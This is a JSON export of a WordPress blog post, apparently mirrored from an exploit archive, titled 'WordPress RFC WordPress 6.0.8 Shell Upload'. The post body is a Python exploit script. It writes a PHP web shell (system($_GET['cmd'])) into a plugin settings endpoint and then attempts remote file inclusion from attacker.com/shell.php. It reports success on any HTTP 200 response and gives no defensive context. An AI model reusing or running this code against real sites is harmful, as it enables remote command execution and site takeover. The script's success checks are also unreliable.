{"id":57534,"date":"2024-06-17T20:00:53","date_gmt":"2024-06-17T17:00:53","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179099\/wprfc608-shell.txt"},"modified":"2024-06-17T20:00:53","modified_gmt":"2024-06-17T17:00:53","slug":"wordpress-rfc-wordpress-6-0-8-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-rfc-wordpress-6-0-8-shell-upload\/","title":{"rendered":"WordPress RFC WordPress 6.0.8 Shell Upload"},"content":{"rendered":"

Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8<\/p>\n

import requests
import sys<\/p>\n

target = “https:\/\/target.com”<\/p>\n

# Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8
#CODE BY E1.Coders “The King of Security”
def exploit_rfc_wordpress():
url = f”{target}\/wp-content\/plugins\/rfc-wordpress\/rfc.php”
payload = “<?php system($_GET[‘cmd’]); ?>”<\/p>\n

try:
response = requests.post(url, data={“rfc_action”: “save_settings”, “rfc_settings”: payload})
if response.status_code == 200:
print(“RCE exploit successful!”)
print(f”Visit {url}?cmd=whoami to execute commands”)
else:
print(“RCE exploit failed.”)
except requests.exceptions.RequestException as e:
print(f”Error: {e}”)<\/p>\n

# Exploit for Remote File Inclusion (RFI) in RFC WordPress
def exploit_rfi_rfc_wordpress():
url = f”{target}\/wp-content\/plugins\/rfc-wordpress\/rfc.php?rfc_action=save_settings”
payload = “http:\/\/attacker.com\/shell.php”<\/p>\n

try:
response = requests.post(url, data={“rfc_settings”: payload})
if response.status_code == 200:
print(“RFI exploit successful!”)
print(f”Visit {target}\/wp-content\/plugins\/rfc-wordpress\/shell.php to execute commands”)
else:
print(“RFI exploit failed.”)
except requests.exceptions.RequestException as e:
print(f”Error: {e}”)<\/p>\n

if __name__ == “__main__”:
exploit_rfc_wordpress()
exploit_rfi_rfc_wordpress()<\/p>\n","protected":false},"excerpt":{"rendered":"

Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8 import requestsimport sys target = “https:\/\/target.com” # Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8#CODE BY E1.Coders “The King of Security”def exploit_rfc_wordpress():url = f”{target}\/wp-content\/plugins\/rfc-wordpress\/rfc.php”payload = “<?php system($_GET[‘cmd’]); ?>” try:response = requests.post(url, data={“rfc_action”: “save_settings”, “rfc_settings”: payload})if response.status_code == 200:print(“RCE exploit successful!”)print(f”Visit {url}?cmd=whoami to execute …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57534","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57534","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57534"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57534\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57534"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57534"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57534"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}